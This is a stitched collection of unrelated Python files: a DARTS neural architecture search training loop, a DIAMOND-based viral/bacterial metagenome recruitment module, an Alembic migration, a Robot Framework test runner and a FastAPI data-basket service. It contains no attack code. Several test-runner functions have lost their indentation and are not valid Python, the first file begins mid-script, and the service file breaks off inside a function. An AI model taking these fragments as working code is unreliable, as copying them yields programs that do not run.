writer = SummaryWriter(log_dir=os.path.join(config.path, "tb"))
writer.add_text('config', config.as_markdown(), 0)

# run-level logger writing to <run path>/<name>.log
logger = utils.get_logger(os.path.join(config.path, "{}.log".format(config.name)))
config.print_params(logger.info)
def main():
    """Run DARTS architecture search: build model, alternate alpha/weight
    optimization per epoch, track the best genotype by validation score."""
    logger.info("Logger is set - training start")

    # set default gpu device id
    torch.cuda.set_device(config.gpus[0])

    # set seed on numpy, torch and every GPU for reproducibility
    np.random.seed(config.seed)
    torch.manual_seed(config.seed)
    torch.cuda.manual_seed_all(config.seed)

    torch.backends.cudnn.benchmark = True  # autotune conv kernels (fixed input size)

    # get data with meta info (uses a separate validation set, not a split)
    input_size, input_channels, n_classes, train_data, valid_data = utils.get_data(
        config.dataset, config.data_path, cutout_length=config.cutout_length, validation=True, val_path=config.val_set, fealen=config.fealen, inputsize=config.input_size)

    net_crit = nn.CrossEntropyLoss().to(device)
    model = SearchCNNController(input_channels, config.init_channels, n_classes, config.layers,
                                net_crit, device_ids=config.gpus)
    model = model.to(device)

    # weights optimizer (network weights w)
    w_optim = torch.optim.SGD(model.weights(), config.w_lr, momentum=config.w_momentum,
                              weight_decay=config.w_weight_decay)
    # alphas optimizer (architecture parameters)
    alpha_optim = torch.optim.Adam(model.alphas(), config.alpha_lr, betas=(0.5, 0.999),
                                   weight_decay=config.alpha_weight_decay)

    # (The original half/half SubsetRandomSampler split of train_data was
    # replaced by a dedicated valid_data set; dead commented code removed.)
    # ImbalancedDatasetSampler rebalances classes, so shuffle is disabled.
    train_loader = torch.utils.data.DataLoader(train_data,
                                               batch_size=config.batch_size,
                                               # shuffle=True,
                                               sampler=ImbalancedDatasetSampler(train_data),
                                               num_workers=config.workers,
                                               pin_memory=True,
                                               drop_last=True)
    valid_loader = torch.utils.data.DataLoader(valid_data,
                                               batch_size=config.batch_size,
                                               shuffle=False,
                                               num_workers=config.workers,
                                               pin_memory=True,
                                               drop_last=True)
    lr_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(
        w_optim, config.epochs, eta_min=config.w_lr_min)
    architect = Architect(model, config.w_momentum, config.w_weight_decay)

    # training loop
    best_top1 = 0.
    for epoch in range(config.epochs):
        # NOTE(review): scheduler stepped before the optimizer steps of the
        # epoch — original DARTS ordering, kept as-is (PyTorch >=1.1 would
        # normally step after training). TODO confirm intended.
        lr_scheduler.step()
        lr = lr_scheduler.get_lr()[0]

        model.print_alphas(logger)

        # training (joint alpha + weight updates)
        train(train_loader, valid_loader, model, architect, w_optim, alpha_optim, lr, epoch)

        # validation; 'top1' is actually the F1 score returned by validate()
        cur_step = (epoch+1) * len(train_loader)
        top1 = validate(valid_loader, model, epoch, cur_step)

        # log
        # genotype (current discrete architecture)
        genotype = model.genotype()
        logger.info("genotype = {}".format(genotype))

        # genotype as an image
        plot_path = os.path.join(config.plot_path, "EP{:02d}".format(epoch+1))
        caption = "Epoch {}".format(epoch+1)
        plot(genotype.normal, plot_path + "-normal", caption)
        plot(genotype.reduce, plot_path + "-reduce", caption)

        # save best-so-far checkpoint by validation score
        if best_top1 < top1:
            best_top1 = top1
            best_genotype = genotype
            is_best = True
        else:
            is_best = False
        utils.save_checkpoint(model, config.path, is_best)
        print("")

    logger.info("Final best Prec@1 = {:.4%}".format(best_top1))
    logger.info("Best Genotype = {}".format(best_genotype))
def train(train_loader, valid_loader, model, architect, w_optim, alpha_optim, lr, epoch):
    """One epoch of bi-level DARTS search: per step, update architecture
    alphas on a validation batch, then network weights on a training batch."""
    confusion = utils.SumMeter()      # accumulates the 2x2 confusion matrix
    losses = utils.AverageMeter()

    cur_step = epoch*len(train_loader)
    writer.add_scalar('train/lr', lr, cur_step)

    model.train()

    for step, ((trn_X, trn_y), (val_X, val_y)) in enumerate(zip(train_loader, valid_loader)):
        trn_X, trn_y = trn_X.to(device, non_blocking=True), trn_y.to(device, non_blocking=True)
        val_X, val_y = val_X.to(device, non_blocking=True), val_y.to(device, non_blocking=True)
        N = trn_X.size(0)

        # phase 2. architect step (alpha) — unrolled second-order update
        alpha_optim.zero_grad()
        architect.unrolled_backward(trn_X, trn_y, val_X, val_y, lr, w_optim)
        alpha_optim.step()

        # phase 1. child network step (w)
        w_optim.zero_grad()
        logits = model(trn_X)
        loss = model.criterion(logits, trn_y)
        loss.backward()
        # gradient clipping on the network weights only
        nn.utils.clip_grad_norm_(model.weights(), config.w_grad_clip)
        w_optim.step()

        conf_mat = utils.binary_conf_mat(logits, trn_y)
        losses.update(loss.item(), N)
        confusion.update(conf_mat)
        # guard against a batch with no positive samples
        if conf_mat[1, 0] + conf_mat[1, 1] > 0:
            recall = conf_mat[1, 1] / (conf_mat[1, 0] + conf_mat[1, 1])
        else:
            recall = 0
        fa = conf_mat[0, 1]  # false alarms: negatives predicted positive
        f1_score = utils.binary_f1_score(conf_mat)

        if step % config.print_freq == 0 or step == len(train_loader)-1:
            logger.info(
                "Train: [{:3d}/{}] Step {:03d}/{:03d} Loss: {:.3f} Recall: {:.3f} FA: {:d} F1: {:3f}".format(
                    epoch+1, config.epochs, step, len(train_loader)-1, losses.avg, recall, fa, f1_score))
            logger.info(conf_mat.flatten())

        writer.add_scalar('train/loss', loss.item(), cur_step)
        cur_step += 1

    # epoch-level metrics from the summed confusion matrix
    recall = confusion.val[1,1]/(confusion.val[1,0]+confusion.val[1,1])
    fa = confusion.val[0,1]
    f1_score = utils.binary_f1_score(confusion.val)
    logger.info("Train: [{:3d}/{}] Final Recall {:.4%} FA {:d} F1: {:.4%}".format(epoch+1, config.epochs, recall, fa, f1_score))
    logger.info(confusion.val.flatten())
def validate(valid_loader, model, epoch, cur_step):
    """Evaluate the model on the validation set; returns the epoch F1 score."""
    confusion = utils.SumMeter()      # accumulates the 2x2 confusion matrix
    losses = utils.AverageMeter()

    model.eval()

    with torch.no_grad():
        start = time.time()
        for step, (X, y) in enumerate(valid_loader):
            X, y = X.to(device, non_blocking=True), y.to(device, non_blocking=True)
            N = X.size(0)

            logits = model(X)
            loss = model.criterion(logits, y)

            conf_mat = utils.binary_conf_mat(logits, y)
            losses.update(loss.item(), N)
            confusion.update(conf_mat)
            # guard against a batch with no positive samples
            if conf_mat[1, 0] + conf_mat[1, 1] > 0:
                recall = conf_mat[1, 1] / (conf_mat[1, 0] + conf_mat[1, 1])
            else:
                recall = 0
            fa = conf_mat[0, 1]  # false alarms
            f1_score = utils.binary_f1_score(conf_mat)

            if step % config.print_freq == 0 or step == len(valid_loader)-1:
                logger.info(
                    "Valid: [{:3d}/{}] Step {:03d}/{:03d} Loss: {:.3f} Recall: {:.3f} FA: {:d} F1: {:3f}".format(
                        epoch+1, config.epochs, step, len(valid_loader)-1, losses.avg, recall, fa, f1_score))
                logger.info(conf_mat.flatten())
        val_time = time.time() - start

    # epoch-level metrics from the summed confusion matrix
    recall = confusion.val[1,1]/(confusion.val[1,0]+confusion.val[1,1])
    fa = confusion.val[0,1]
    f1_score = utils.binary_f1_score(confusion.val)
    writer.add_scalar('val/loss', losses.avg, epoch)
    writer.add_scalar('val/recall', recall, epoch)
    writer.add_scalar('val/fa', fa, epoch)
    writer.add_scalar('val/f1_score', f1_score, epoch)
    logger.info("Valid: [{:3d}/{}] Final Recall {:.4%} FA {:d} F1: {:.4%}".format(epoch+1, config.epochs, recall, fa, f1_score))
    logger.info(confusion.val.flatten())
    logger.info("Valid: Time Spent: %fs"%val_time)

    return f1_score
# Script entry point.
if __name__ == "__main__":
    main()
|
from __future__ import print_function
import os
import os.path as op
import subprocess
import sys
import tempfile
import pandas as pd
from pysam import FastxFile
from viruscope.tools import file_transaction, file_exists
import math
def readfx(fastx):
    """Yield (name, sequence, quality) tuples from a FASTA/FASTQ file.

    Args:
        fastx (str): path to a fasta/fastq file

    Raises:
        IOError: if *fastx* does not exist.
    """
    if not file_exists(fastx):
        # fix: this module defines no 'logger', so the old logger.critical()
        # call raised a NameError instead of the intended IOError
        print("File Not Found: %s" % fastx, file=sys.stderr)
        raise IOError(2, "No such file:", fastx)
    fx = ""
    try:
        fx = FastxFile(fastx)
        for f in fx:
            yield f.name, f.sequence, f.quality
    finally:
        # close the pysam handle even if the consumer abandons the generator
        if fx:
            fx.close()
def read_count(fname):
    """Count the number of reads and write metadata .count file.

    A cached '<fname>.count' file is used when present; otherwise the reads
    are counted and the cache file is (best-effort) written.

    Args:
        fname (str): fastq or fasta file path
    Returns:
        read_count (int): number of reads within fasta/fastq file (0 if the
        file is missing)
    """
    if not op.exists(fname):  # fix: was '== False'
        # fix: this module defines no 'logger'; the old logger.error()
        # call raised a NameError on the missing-file path
        print("could not find file: %s" % fname, file=sys.stderr)
        return 0
    count_file = '{}.count'.format(fname)
    if op.exists(count_file):
        # fix: return an int (was the raw string) and close the handle
        with open(count_file) as fh:
            return int(fh.read().split("\n")[0])
    total_reads = 0
    for name, seq, qual in readfx(fname):
        total_reads += 1
    try:
        with open(count_file, "w") as oh:
            print(total_reads, file=oh)
    except IOError:
        # cache write is best-effort; the count is still valid
        pass
    return total_reads
def make_diamond_db(fasta, db, threads=1, verbose=False):
    """Build a DIAMOND protein database from *fasta* at prefix *db*.

    Returns the database prefix (DIAMOND itself appends '.dmnd').
    The build is skipped if '<db>.dmnd' already exists.
    """
    out_file = db + ".dmnd"
    if file_exists(out_file):
        return db
    if verbose:
        print("Creating DIAMOND database for", fasta, file=sys.stderr)
    # file_transaction presumably writes to a temp path and moves it into
    # place on success, avoiding half-written databases — TODO confirm.
    with file_transaction(out_file) as tx_out_file:
        cmd = ("diamond makedb --in {fasta} -d {db} "
               "-p {threads}").format(fasta=fasta,
                                      db=tx_out_file,
                                      threads=threads)
        subprocess.check_call(cmd, shell=True)
    return db
def diamond_blastx(fasta, out_file, db, threads=1, verbose=False):
    """Run DIAMOND BLASTX of *fasta* against database prefix *db*.

    Writes a .daa archive to *out_file* and returns that path; skipped if
    *out_file* already exists.
    """
    if file_exists(out_file):
        return out_file
    if verbose:
        print("Running DIAMOND BLASTX on %s across %s" %
              (os.path.basename(fasta), os.path.basename(db)),
              file=sys.stderr)
    with file_transaction(out_file) as tx_out_file:
        cmd = ("diamond blastx -d {db} -q {fasta} "
               "-a {out} -p {threads} -t {tmpdir}").format(db=db,
                                                           fasta=fasta,
                                                           out=tx_out_file,
                                                           threads=threads,
                                                           tmpdir=tempfile.gettempdir())
        subprocess.check_call(cmd, shell=True)
    return out_file
def diamond_view(daa, out_file, threads, verbose=False):
    ''' converts diamond result to a gzipped tabular output

    NOTE(review): 'threads' is accepted but never used in the body; callers
    must still pass it positionally ahead of 'verbose'.
    '''
    if file_exists(out_file):
        return out_file
    if verbose:
        print("Converting DIAMOND database %s to tabular (%s)" %
              (os.path.basename(daa), os.path.basename(out_file)),
              file=sys.stderr)
    with file_transaction(out_file) as tx_out_file:
        # write the uncompressed name first, then gzip to match *out_file*
        nongz = tx_out_file.rpartition(".")[0]
        subprocess.check_call(["diamond", "view", "-a", daa, "-o", nongz])
        subprocess.check_call(["gzip", nongz])
    return out_file
## stats table construction
def import_diamond_tsv(tsv, pctid=50.0, best_hit=True):
    """Load a DIAMOND tabular (BLAST outfmt-6) file as a DataFrame.

    Rows below *pctid* percent identity are dropped; when *best_hit* is
    True only the longest/highest-bitscore hit per query is kept.
    """
    columns = ("qseqid sseqid pident length mismatch gapopen qstart qend "
               "sstart send evalue bitscore").split()
    hits = pd.read_csv(tsv, names=columns, sep="\t")
    hits = hits[hits['pident'] >= pctid]
    if not best_hit:
        return hits
    ordered = hits.sort_values(by=['qseqid', 'length', 'bitscore'], ascending=False)
    return ordered.drop_duplicates(subset='qseqid', keep='first')
def summarize_by_contig(df, hitscol):
    """Sum *hitscol* per contig; returns a Series named after the column."""
    totals = df.groupby('contig')[hitscol].sum()
    return totals.rename(hitscol)
def contig_lengths(infile):
    '''Create a dict mapping contig names to lengths from a gff or fasta file.

    File type is guessed from the extension: anything containing "g" is
    treated as gff, else anything containing "f" as fasta.

    Raises:
        IOError: if the extension matches neither format.
    '''
    outdict = {}
    suffix = infile.split(".")[-1]
    if "g" in suffix:
        filetype = 'gff'
        print("looks like input contig file is in gff format.", file=sys.stdout)
    elif "f" in suffix:
        filetype = 'fasta'
        print("looks like input config file is in fasta format.", file=sys.stdout)
    else:
        # fix: IOError takes no 'file' keyword — the old
        # "raise IOError(..., file=sys.stderr)" raised a TypeError instead
        raise IOError("can't figure out what kind of file contig file is. Make sure it's either in fasta or gff format.")
    if filetype == 'gff':
        with open(infile) as ih:
            for l in ih:
                # '##sequence-region <name> <start> <end>' header lines
                if l.startswith("##sequence-region"):
                    vec = l.strip().split()
                    # fix: store ints so both branches agree (the fasta
                    # branch already stored len(seq) as int)
                    outdict[vec[1]] = int(vec[-1])
    elif filetype == 'fasta':
        for name, seq, qual in readfx(infile):
            outdict[name] = len(seq)
    return outdict
def compute_fr(tbl, clens, mult=1e6):
    '''
    Compute per-contig metagenome recruitment fractions.

    For every 'hit_<mg>' column, adds a matching 'fr_<mg>' column:
    hits / (metagenome read count * contig length) * mult.

    Args:
        tbl: output stats table with mg hit and read counts from diamond recruitment
        clens: dict of contig lengths
        mult: factor to multiply fraction by to make readiable
    Outputs:
        pandas DataFrame with mg_fr values calculated
    '''
    # attach contig lengths (float() tolerates str or int values in clens)
    clen_tbl = pd.DataFrame(data={'contig_length':[float(clens[i]) for i in list(clens.keys())], 'contig':list(clens.keys())})
    tbl = tbl.merge(clen_tbl, on='contig', how='outer')
    # pair each 'hit_<mg>' column with its 'reads_<mg>' counterpart
    hits_cols = [i for i in tbl.columns if 'hit' in i]
    count_cols = ["_".join(["reads",i.split("_")[1]]) for i in hits_cols]
    for h, c in zip(hits_cols, count_cols):
        fr = tbl[h]/(tbl[c] * tbl['contig_length']) * mult
        tbl[h.replace("hit_","fr_")] = fr
    return tbl
def orf_map(gff):
    """Parse a gff file into a DataFrame mapping each ORF id to its contig."""
    cols = ['contig', 'app', 'type', 'start', 'stop', 'dot', 'strand', 'val', 'notes']
    frame = pd.read_csv(gff, comment='#', sep="\t", names=cols).dropna()
    # ORF id is the 'ID=...' token at the front of the notes field
    frame['orf'] = [entry.split(";")[0].replace("ID=", "") for entry in frame['notes']]
    frame['len'] = frame['stop'] - frame['start']
    return frame[['contig', 'orf']]
def map_orfs_to_contigs(df, contig_file):
    """Attach a 'contig' column to *df* (which carries an 'orf' column).

    If *contig_file* looks like gff, contigs come from the gff mapping;
    otherwise the contig name is assumed to be the ORF name minus its
    trailing '_<n>' suffix.
    """
    if "g" in contig_file.split(".")[-1]:
        print("looks like input contig file is in gff format. Will map ORFs to contigs using that.")
        return pd.merge(df, orf_map(contig_file), on='orf', how='outer')
    print("doesn't look like input contig file is in gff format. Will assume that contig name is embedded in the ORF name.")
    df['contig'] = ["_".join(name.split("_")[:-1]) for name in df['orf']]
    return df
def recruit_category(l):
    """Label a contig row 'vir', 'bac', or 'low recruitment'.

    Requires more than 50 hits from either metagenome to call a category;
    otherwise the recruitment is considered too low to decide.
    """
    enough_hits = (l['hit_mg-bac'] > 50) | (l['hit_mg-vir'] > 50)
    if not enough_hits:
        return 'low recruitment'
    return 'vir' if l['fr_mg-vir'] > l['fr_mg-bac'] else 'bac'
def construct_recruit_tbl(vir_tsv, bac_tsv, read_count_dict, contig_file):
    '''
    Build the per-contig recruitment table comparing viral vs bacterial
    metagenome hits, with fractions, vir/bac ratio and category.

    Args:
        vir_tsv: diamond recruitment converted to tsv for vir metagenome
        bac_tsv: diamond recruitment converted to tsv for bac metagenome
        read_count_dict: dict of mg read counts with two keys -- 'vir_reads' and 'bac_reads'
        contig_file: path to a file with sag contigs in it; either in fasta or gff format
    Returns:
        pandas dataframe with mg fraction calculated
    '''
    # NOTE(review): 'cnames' is unused below (column names are set inside
    # import_diamond_tsv).
    cnames = "qseqid sseqid pident length mismatch gapopen qstart qend sstart send evalue bitscore".split()
    bac_df = import_diamond_tsv(bac_tsv)
    vir_df = import_diamond_tsv(vir_tsv)
    # per-ORF hit counts for each metagenome
    bac_sum = pd.Series(bac_df.groupby('sseqid')['qseqid'].count(), name='hit_mg-bac')
    vir_sum = pd.Series(vir_df.groupby('sseqid')['qseqid'].count(), name='hit_mg-vir')
    orfhits = pd.concat([bac_sum, vir_sum], axis=1).reset_index().rename(columns={'index':'orf','sseqid':'orf'})
    orfhits = map_orfs_to_contigs(orfhits, contig_file)
    # roll ORF-level hits up to contigs and attach the metagenome read totals
    chits = pd.concat([summarize_by_contig(orfhits, 'hit_mg-bac'), summarize_by_contig(orfhits, 'hit_mg-vir')], axis=1)
    chits['reads_mg-vir'] = float(read_count_dict['vir_reads'])
    chits['reads_mg-bac'] = float(read_count_dict['bac_reads'])
    clens = contig_lengths(contig_file)
    out_tbl = compute_fr(chits.reset_index(), clens, mult=1e6)
    out_tbl['ratio_virus_bacteria'] = out_tbl['fr_mg-vir'] / out_tbl['fr_mg-bac']
    # division by a zero bacterial fraction yields inf; store NaN instead
    out_tbl['ratio_virus_bacteria'] = [math.nan if i == float('inf') else i for i in out_tbl['ratio_virus_bacteria']]
    out_tbl['recruit_category'] = [recruit_category(l) for i, l in out_tbl.iterrows()]
    return out_tbl
def run_recruitment(prot_fasta, vir_mg, bac_mg, sag_contigs, output, threads, verbose):
    '''
    Recruit viral and bacterial metagenome reads against SAG proteins via
    DIAMOND, then (optionally) build the per-contig recruitment table.

    Example:
    python recruitment_for_vs.py --threads 10 --output /mnt/scgc/simon/simonsproject/bats248_vs/diamond/pergenome/ --sag-contigs /mnt/scgc/simon/simonsproject/bats248_contigs/coassemblies/AG-920/AG-920-P22_contigs.fasta /mnt/scgc/simon/simonsproject/bats248_vs/prodigal/AG-920-P22_proteins.fasta /mnt/scgc_nfs/ref/viral_dbs/POV.fasta.gz /mnt/scgc_nfs/ref/viral_dbs/LineP-all.fasta.gz
    '''
    fa_name = op.basename(prot_fasta).split(".")[0]
    protein_db = make_diamond_db(prot_fasta,
                                 os.path.join(output,
                                              os.path.basename(prot_fasta).partition(".")[0]),
                                 threads, verbose)
    tsv_list = []
    for q in [vir_mg, bac_mg]:
        qname = op.basename(q).split(".")[0]
        diamond_daa = diamond_blastx(q, os.path.join(output, '{fa}_vs_{qname}.daa'.format(fa=fa_name, qname=qname)),
                                     protein_db, threads, verbose)
        # fix: diamond_view(daa, out_file, threads, verbose) — the old call
        # omitted 'threads', silently binding 'verbose' to the threads param
        diamond_tsv = diamond_view(diamond_daa,
                                   os.path.join(output, '{fa}_vs_{qname}.tsv.gz'.format(fa=fa_name, qname=qname)),
                                   threads, verbose)
        tsv_list.append(diamond_tsv)
    print(",".join(tsv_list))
    if sag_contigs is not None:
        # dict of metagenome read counts
        read_count_dict = {}
        read_count_dict['vir_reads'] = read_count(vir_mg)
        read_count_dict['bac_reads'] = read_count(bac_mg)
        out_tbl = construct_recruit_tbl(tsv_list[0], tsv_list[1], read_count_dict, sag_contigs)
        out_tbl.to_csv(op.join(output, "{}_mg_diamond_recruitment_tbl.csv".format(fa_name)), sep=",", index=False)
    # drop the temporary DIAMOND database once recruitment is done
    os.remove('{}.dmnd'.format(protein_db))
|
"""added locked param to Task model
Revision ID: 3d21a9e6821c
Revises: 041111f828b0
Create Date: 2016-06-21 15:34:11.361072
"""
# revision identifiers, used by Alembic.
revision = '3d21a9e6821c'
down_revision = '041111f828b0'
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Apply the migration: add a nullable boolean ``locked`` column to ``tasks``."""
    ### commands auto generated by Alembic - please adjust! ###
    op.add_column('tasks', sa.Column('locked', sa.Boolean(), nullable=True))
    ### end Alembic commands ###
def downgrade():
    """Revert the migration: drop the ``locked`` column from ``tasks``."""
    ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('tasks', 'locked')
    ### end Alembic commands ###
#!/usr/bin/env python
import os
import sys
from subprocess import Popen, call
from tempfile import TemporaryFile
import env
from run_unit_tests import run_unit_tests
# Arguments for the Robot Framework test runner.  '%(...)s' placeholders are
# filled from ARG_VALUES at invocation time, and 'SP' is turned into a space
# via --escape space:SP.
ROBOT_ARGS = ['--doc', 'SeleniumSPacceptanceSPtestsSPwithSP%(browser)s', '--outputdir', '%(outdir)s', '--variable', 'browser:%(browser)s', '--variable',
              'pyversion:%(pyVersion)s', '--escape', 'space:SP', '--report', 'none', '--log', 'none', # '--suite', 'Acceptance.Keywords.Textfields',
              '--loglevel', 'DEBUG', '--pythonpath', '%(pythonpath)s', '--noncritical', 'known_issue_-_%(pyVersion)s', '--noncritical', 'known_issue_-_%(browser)s', ]
# Arguments for the rebot post-processing step (same placeholder convention).
REBOT_ARGS = ['--outputdir', '%(outdir)s', '--name', '%(browser)sSPAcceptanceSPTests', '--escape', 'space:SP', '--critical', 'regression', '--noncritical',
              'inprogress', '--noncritical', 'known_issue_-_%(pyVersion)s', '--noncritical', 'known_issue_-_%(browser)s', ]
# Shared substitution values; 'browser' and 'pyVersion' are filled in by acceptance_tests().
ARG_VALUES = {'outdir': env.RESULTS_DIR, 'pythonpath': ':'.join((env.SRC_DIR, env.TEST_LIBS_DIR))}
def acceptance_tests(interpreter, browser, args):
    """Run the acceptance suite with the given interpreter and browser.

    Returns rebot's exit code (the number of failed critical tests).
    """
    ARG_VALUES['browser'] = browser.replace('*', '')
    ARG_VALUES['pyVersion'] = interpreter + sys.version[:3]
    start_http_server()
    runners = {'python': 'pybot', 'jython': 'jybot', 'ipy': 'ipybot'}
    runner = runners[interpreter]
    if os.sep == '\\':
        # Windows needs the batch-file wrapper.
        runner = runner + '.bat'
    execute_tests(runner, args)
    stop_http_server()
    return process_output(args)
def start_http_server():
    """Launch the test HTTP server in the background, discarding its output."""
    output_sink = TemporaryFile()
    Popen(['python', env.HTTP_SERVER_FILE, 'start'],
          stdout=output_sink, stderr=output_sink)
def execute_tests(runner, args):
if not os.path.exists(env.RESULTS_DIR):
os.mkdir(env.RESULTS_DIR)
command = [runner] + [arg % ARG_VALUES for arg in ROBOT_ARGS] + args + [env.ACCEPTANCE_TEST_DIR]
print ''
print 'Starting test execution with command:\n' + ' '.join(command)
syslog = os.path.join(env.RESULTS_DIR, 'syslog.txt')
call(command, shell=os.sep == '\\', env=dict(os.environ, ROBOT_SYSLOG_FILE=syslog))
def stop_http_server():
    """Ask the background test HTTP server to shut down."""
    stop_command = ['python', env.HTTP_SERVER_FILE, 'stop']
    call(stop_command)
def process_output(args):
print
if _has_robot_27():
call(['python', os.path.join(env.RESOURCES_DIR, 'statuschecker.py'), os.path.join(env.RESULTS_DIR, 'output.xml')])
rebot = 'rebot' if os.sep == '/' else 'rebot.bat'
rebot_cmd = [rebot] + [arg % ARG_VALUES for arg in REBOT_ARGS] + args + [os.path.join(ARG_VALUES['outdir'], 'output.xml')]
print ''
print 'Starting output processing with command:\n' + ' '.join(rebot_cmd)
rc = call(rebot_cmd, env=os.environ)
if rc == 0:
print 'All critical tests passed'
else:
print '%d critical test%s failed' % (rc, 's' if rc != 1 else '')
return rc
def _has_robot_27():
try:
from robot.result import ExecutionResult
except:
return False
return True
def _exit(rc):
sys.exit(rc)
def _help():
    """Print usage instructions and return the exit code used for bad invocations."""
    print 'Usage: python run_tests.py python|jython browser [options]'
    print
    print 'See README.txt for details.'
    return 255
def _run_unit_tests():
print 'Running unit tests'
failures = run_unit_tests()
if failures != 0:
print '\n%d unit tests failed - not running acceptance tests!' % failures
else:
print 'All unit tests passed'
return failures
if __name__ == '__main__':
    # Usage: run_tests.py <interpreter> <browser> [robot options...]
    if not len(sys.argv) > 2:
        _exit(_help())
    # Unit tests gate the (slower) acceptance run.
    unit_failures = _run_unit_tests()
    if unit_failures:
        _exit(unit_failures)
    interpreter = sys.argv[1]
    browser = sys.argv[2].lower()
    args = sys.argv[3:]
    # Passing 'unit' as the browser runs the unit tests only.
    if browser != 'unit':
        _exit(acceptance_tests(interpreter, browser, args))
|
import smtplib
import time
import uuid
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import confuse
import requests
from fastapi import FastAPI, HTTPException, BackgroundTasks
from owslib.util import log
from owslib.wps import WebProcessingService, WPSExecution
from pydantic.types import EmailStr
from app import status
from app.fimex import Fimex
from app.solr_client import SolrClient
from app.status import Status
from app.transaction import Transaction
app = FastAPI()
# Upper bound (seconds) that check_process_status polls a WPS execution before
# reporting Status.EXCEEDED.
MAX_PROCESSING_SECOND = 600
@app.get("/basket/transfer2")
# NOTE(review): this endpoint duplicates /basket/transfer below line-for-line;
# consider extracting the shared body into a single helper so fixes land in both.
async def fimex_transfer2(*,
                          user_id: str,
                          email: EmailStr,
                          uri: str,
                          wps_url: str,
                          reducetime_start: str = None,
                          reducetime_end: str = None,
                          interpolate_proj_string: str = None,
                          interpolate_method: str = None,
                          select_variables: str,
                          interpolate_xaxis_min: str = None,
                          interpolate_xaxis_max: str = None,
                          interpolate_yaxis_min: str = None,
                          interpolate_yaxis_max: str = None,
                          interpolate_xaxis_units: str = None,
                          interpolate_yaxis_units: str = None,
                          reducebox_east: str,
                          reducebox_south: str,
                          reducebox_west: str,
                          reducebox_north: str,
                          interpolate_hor_steps: str = None,
                          inputtype: str,
                          outputtype: str,
                          background_tasks: BackgroundTasks):
    # 'uri' may carry several comma-separated dataset URLs; one Fimex job is
    # built per input file, all sharing the same transformation parameters.
    input_files = uri.split(",")
    fimex_list = []
    for input_file in input_files:
        print(input_file)
        fimex_list.append(
            Fimex(
                wps_url,
                input_file,
                reducetime_start,
                reducetime_end,
                interpolate_proj_string,
                interpolate_method,
                select_variables,
                interpolate_xaxis_min,
                interpolate_xaxis_max,
                interpolate_yaxis_min,
                interpolate_yaxis_max,
                interpolate_xaxis_units,
                interpolate_yaxis_units,
                reducebox_east,
                reducebox_south,
                reducebox_west,
                reducebox_north,
                interpolate_hor_steps,
                inputtype,
                outputtype
            )
        )
    # wps=http://localhost:5000/wps?request=GetCapabilities&service=WPS
    # input_file = 'http://OpeDAP-server/thredds/dodsC/NBS/S2B/2018/02/18/S2B_MSIL1C_20180218T110109_N0206_R094_T33WWS_20180218T144023.nc'
    # wps=http://localhost:5000/cgi-bin/pywps.cgi?service=wps&version=1.0.0&request=getcapabilities
    # skip_caps=True avoids a GetCapabilities round-trip when constructing the client.
    wps = WebProcessingService(
        wps_url,
        verbose=False,
        skip_caps=True
    )
    config = confuse.Configuration('Basket', __name__)
    # Record the order in Solr immediately (status ORDERED), before execution starts.
    transaction = Transaction(str(uuid.uuid4()), user_id, email, status.Status.ORDERED, "nordatanet", fimex_list)
    solr_client = SolrClient(config['solr']['endpoint'].get(), "basket")
    solr_client.update(transaction.toSolrDocument())
    try:
        for fimex in fimex_list:
            execution = wps.execute('transformation', fimex.input_map(), output=fimex.output_map())
            # doFinal polls the WPS job after the response is sent, then emails the user.
            background_tasks.add_task(doFinal, execution, email, transaction)
            print(execution.statusLocation)
    except requests.exceptions.ConnectionError as ce:
        raise HTTPException(status_code=502, detail="Failed to establish a connection")
    return transaction.toJson()
@app.get("/basket/transfer")
# NOTE(review): this endpoint is a line-for-line duplicate of /basket/transfer2
# above; consider extracting the shared body into a single helper.
async def fimex_transfer(*,
                         user_id: str,
                         email: EmailStr,
                         uri: str,
                         wps_url: str,
                         reducetime_start: str = None,
                         reducetime_end: str = None,
                         interpolate_proj_string: str = None,
                         interpolate_method: str = None,
                         select_variables: str,
                         interpolate_xaxis_min: str = None,
                         interpolate_xaxis_max: str = None,
                         interpolate_yaxis_min: str = None,
                         interpolate_yaxis_max: str = None,
                         interpolate_xaxis_units: str = None,
                         interpolate_yaxis_units: str = None,
                         reducebox_east: str,
                         reducebox_south: str,
                         reducebox_west: str,
                         reducebox_north: str,
                         interpolate_hor_steps: str = None,
                         inputtype: str,
                         outputtype: str,
                         background_tasks: BackgroundTasks):
    # 'uri' may carry several comma-separated dataset URLs; one Fimex job is
    # built per input file, all sharing the same transformation parameters.
    input_files = uri.split(",")
    fimex_list = []
    for input_file in input_files:
        print(input_file)
        fimex_list.append(
            Fimex(
                wps_url,
                input_file,
                reducetime_start,
                reducetime_end,
                interpolate_proj_string,
                interpolate_method,
                select_variables,
                interpolate_xaxis_min,
                interpolate_xaxis_max,
                interpolate_yaxis_min,
                interpolate_yaxis_max,
                interpolate_xaxis_units,
                interpolate_yaxis_units,
                reducebox_east,
                reducebox_south,
                reducebox_west,
                reducebox_north,
                interpolate_hor_steps,
                inputtype,
                outputtype
            )
        )
    # wps=http://localhost:5000/wps?request=GetCapabilities&service=WPS
    # input_file = 'http://OpeDAP-server/thredds/dodsC/NBS/S2B/2018/02/18/S2B_MSIL1C_20180218T110109_N0206_R094_T33WWS_20180218T144023.nc'
    # wps=http://localhost:5000/cgi-bin/pywps.cgi?service=wps&version=1.0.0&request=getcapabilities
    # skip_caps=True avoids a GetCapabilities round-trip when constructing the client.
    wps = WebProcessingService(
        wps_url,
        verbose=False,
        skip_caps=True
    )
    config = confuse.Configuration('Basket', __name__)
    # Record the order in Solr immediately (status ORDERED), before execution starts.
    transaction = Transaction(str(uuid.uuid4()), user_id, email, status.Status.ORDERED, "nordatanet", fimex_list)
    solr_client = SolrClient(config['solr']['endpoint'].get(), "basket")
    solr_client.update(transaction.toSolrDocument())
    try:
        for fimex in fimex_list:
            execution = wps.execute('transformation', fimex.input_map(), output=fimex.output_map())
            # doFinal polls the WPS job after the response is sent, then emails the user.
            background_tasks.add_task(doFinal, execution, email, transaction)
            print(execution.statusLocation)
    except requests.exceptions.ConnectionError as ce:
        raise HTTPException(status_code=502, detail="Failed to establish a connection")
    return transaction.toJson()
def doFinal(execution: WPSExecution, to, transaction: Transaction):
    """Background task: wait for the WPS job, record its final status in Solr and notify the user."""
    log.info('Fimex Transfermation ordered ' + execution.statusLocation)
    # Renamed local to avoid shadowing the imported `status` module.
